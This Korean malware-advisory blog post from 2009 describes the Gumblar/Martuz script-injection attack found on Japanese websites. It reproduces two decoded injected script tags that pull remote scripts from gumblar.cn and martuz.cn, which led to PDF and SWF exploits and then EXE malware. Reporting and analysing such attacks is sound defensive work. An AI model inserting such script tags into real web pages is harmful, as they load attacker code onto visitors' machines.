태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

'gumblar.cn'에 해당되는 글 1건

  1. 2009.05.21 [Web Attack] 일본 사이트 스크립트 공격 (2)
신종악성코드정보2009.05.21 17:37



일명 "GENO 바이러스"로 알려진 악의적인 스크립트 코드가 여러 일본 사이트에서 지속적으로 발견되고 있다.

처음 Injection 공격이 이루어진 것은 gumblar.cn 이며, 그 후 martuz.cn 으로 변경되었다.

사용자 삽입 이미지

1번 형식은 디코딩을 하면 다음과 같은 코드가 보여진다. (현재 연결 안됨)
<script src=//gumblar.cn/rss/?id=568825></script>

사용자 삽입 이미지

2번 형식은 디코딩을 하면 다음과 같은 코드가 보여진다. (현재 연결 안됨)
<script src=//martuz.cn/vid/?id=568825></script>

각각의 스크립트가 정상적으로 작동한 시점에는 PDF Exploit 과 SWF Exploit 코드가 추가적으로 설치되었고, 그 후에 최종적으로 EXE 악성코드가 설치된다.

http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/

http://blog.naver.com/koheung/120068784986



Posted by viruslab